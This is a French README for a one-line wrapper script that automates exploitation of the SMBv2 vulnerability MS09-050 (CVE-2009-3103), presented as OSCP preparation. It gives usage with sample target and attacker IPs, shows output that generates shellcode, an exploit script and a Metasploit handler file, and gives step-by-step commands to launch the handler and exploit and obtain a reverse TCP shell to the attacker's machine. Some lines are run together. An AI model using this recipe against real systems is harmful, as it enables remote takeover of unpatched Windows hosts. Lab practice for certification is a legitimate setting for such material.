
Mise en place en une ligne pour l'exploitation de MS09-050 (CVE-2009-3103). Sans prise de tête, sans débogage, ça fonctionne.
La plupart des scripts MS09-050 qui circulent nécessitent une injection manuelle du shellcode, ont des problèmes de timing avec les handlers, ou tout simplement ne fonctionnent pas. Ce wrapper :
Conçu pour la préparation à l'OSCP, où le temps compte.
msfvenommsfconsolepython2rpcclient (généralement préinstallé)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
Sortie :
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
Terminal 1 - Démarrez le handler :
msfconsole -q -r handler.rc
Attendez le message : Started reverse TCP handler on ...
Terminal 2 - Lancez l'exploit :
python2 exploit.py 192.168.233.40
Vérifiez dans le Terminal 1 que vous avez bien votre shell.
windows/shell/reverse_tcp) - fonctionne de manière fiable avec le stager de cet exploitExploit original basé sur le PoC MS09-050 d'ohnozzy.
MIT - Faites ce que vous voulez, ne soyez simplement pas diabolique.